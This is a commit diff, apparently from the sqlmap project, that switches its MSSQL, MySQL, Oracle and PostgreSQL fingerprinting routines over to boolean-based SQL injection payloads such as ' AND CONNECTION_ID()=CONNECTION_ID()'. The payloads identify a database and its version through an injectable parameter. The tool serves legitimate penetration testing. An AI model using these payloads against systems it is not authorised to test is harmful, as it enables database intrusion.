Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 79c8d63

Browse files
bdamelebdamele
committed
Major speed increase in DBMS basic fingerprint
1 parent 64bb57d commit 79c8d63

4 files changed

Lines changed: 45 additions & 26 deletions

File tree

plugins/dbms/mssqlserver.py

Lines changed: 18 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -177,18 +177,24 @@ def checkDbms(self):
177177
logger.info(logMsg)
178178

179179
randInt = str(randomInt(1))
180-
query = "LTRIM(STR(LEN(%s)))" % randInt
181-
182-
if inject.getValue(query) == "1":
183-
query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
184-
version = inject.getValue(query)
185-
186-
if version == "8":
187-
kb.dbmsVersion = ["2008"]
188-
elif version == "5":
189-
kb.dbmsVersion = ["2005"]
190-
elif version == "0":
191-
kb.dbmsVersion = ["2000"]
180+
181+
payload = agent.fullPayload(" AND LTRIM(STR(LEN(%s)))='%s'" % (randInt, randInt))
182+
result = Request.queryPage(payload)
183+
184+
if result == True:
185+
for version in ( 0, 5, 8 ):
186+
payload = agent.fullPayload(" AND SUBSTRING((@@VERSION), 25, 1)='%d'" % version)
187+
result = Request.queryPage(payload)
188+
189+
if result == True:
190+
if version == 8:
191+
kb.dbmsVersion = ["2008"]
192+
elif version == 5:
193+
kb.dbmsVersion = ["2005"]
194+
elif version == 0:
195+
kb.dbmsVersion = ["2000"]
196+
197+
break
192198

193199
if kb.dbmsVersion:
194200
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])

plugins/dbms/mysql.py

Lines changed: 7 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -249,15 +249,18 @@ def checkDbms(self):
249249
logger.info(logMsg)
250250

251251
randInt = str(randomInt(1))
252-
query = "CONCAT('%s', '%s')" % (randInt, randInt)
253252

254-
if inject.getValue(query) == (randInt * 2):
253+
payload = agent.fullPayload(" AND CONNECTION_ID()=CONNECTION_ID()")
254+
result = Request.queryPage(payload)
255+
256+
if result == True:
255257
logMsg = "confirming MySQL"
256258
logger.info(logMsg)
257259

258-
query = "LENGTH('%s')" % randInt
260+
payload = agent.fullPayload(" AND CONCAT('%s', '%s')='%s%s'" % (randInt, randInt, randInt, randInt))
261+
result = Request.queryPage(payload)
259262

260-
if not inject.getValue(query) == "1":
263+
if result != True:
261264
warnMsg = "the back-end DMBS is not MySQL"
262265
logger.warn(warnMsg)
263266

plugins/dbms/oracle.py

Lines changed: 11 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -26,6 +26,7 @@
2626

2727
import re
2828

29+
from lib.core.agent import agent
2930
from lib.core.common import formatDBMSfp
3031
from lib.core.common import formatFingerprint
3132
from lib.core.common import getHtmlErrorFp
@@ -38,6 +39,7 @@
3839
from lib.core.settings import ORACLE_SYSTEM_DBS
3940
from lib.core.unescaper import unescaper
4041
from lib.request import inject
42+
from lib.request.connect import Connect as Request
4143

4244
from plugins.generic.enumeration import Enumeration
4345
from plugins.generic.filesystem import Filesystem
@@ -163,17 +165,17 @@ def checkDbms(self):
163165
logMsg = "testing Oracle"
164166
logger.info(logMsg)
165167

166-
query = "LENGTH(SYSDATE)"
167-
sysdate = inject.getValue(query)
168+
payload = agent.fullPayload(" AND ROWNUM=ROWNUM")
169+
result = Request.queryPage(payload)
168170

169-
if sysdate and int(sysdate) > 0:
171+
if result == True:
170172
logMsg = "confirming Oracle"
171173
logger.info(logMsg)
172174

173-
query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
174-
version = inject.getValue(query)
175+
payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
176+
result = Request.queryPage(payload)
175177

176-
if not version:
178+
if result != True:
177179
warnMsg = "the back-end DMBS is not Oracle"
178180
logger.warn(warnMsg)
179181

@@ -186,6 +188,9 @@ def checkDbms(self):
186188
if not conf.extensiveFp:
187189
return True
188190

191+
query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
192+
version = inject.getValue(query)
193+
189194
if re.search("^11", version):
190195
kb.dbmsVersion = ["11i"]
191196
elif re.search("^10", version):

plugins/dbms/postgresql.py

Lines changed: 9 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -26,6 +26,7 @@
2626

2727
import re
2828

29+
from lib.core.agent import agent
2930
from lib.core.common import formatDBMSfp
3031
from lib.core.common import formatFingerprint
3132
from lib.core.common import getHtmlErrorFp
@@ -39,6 +40,7 @@
3940
from lib.core.settings import PGSQL_SYSTEM_DBS
4041
from lib.core.unescaper import unescaper
4142
from lib.request import inject
43+
from lib.request.connect import Connect as Request
4244

4345
from plugins.generic.enumeration import Enumeration
4446
from plugins.generic.filesystem import Filesystem
@@ -168,15 +170,18 @@ def checkDbms(self):
168170
logger.info(logMsg)
169171

170172
randInt = str(randomInt(1))
171-
query = "COALESCE(%s, NULL)" % randInt
172173

173-
if inject.getValue(query) == randInt:
174+
payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt))
175+
result = Request.queryPage(payload)
176+
177+
if result == True:
174178
logMsg = "confirming PostgreSQL"
175179
logger.info(logMsg)
176180

177-
query = "LENGTH('%s')" % randInt
181+
payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
182+
result = Request.queryPage(payload)
178183

179-
if not inject.getValue(query) == "1":
184+
if result != True:
180185
warnMsg = "the back-end DMBS is not PostgreSQL"
181186
logger.warn(warnMsg)
182187

0 commit comments

Comments
 (0)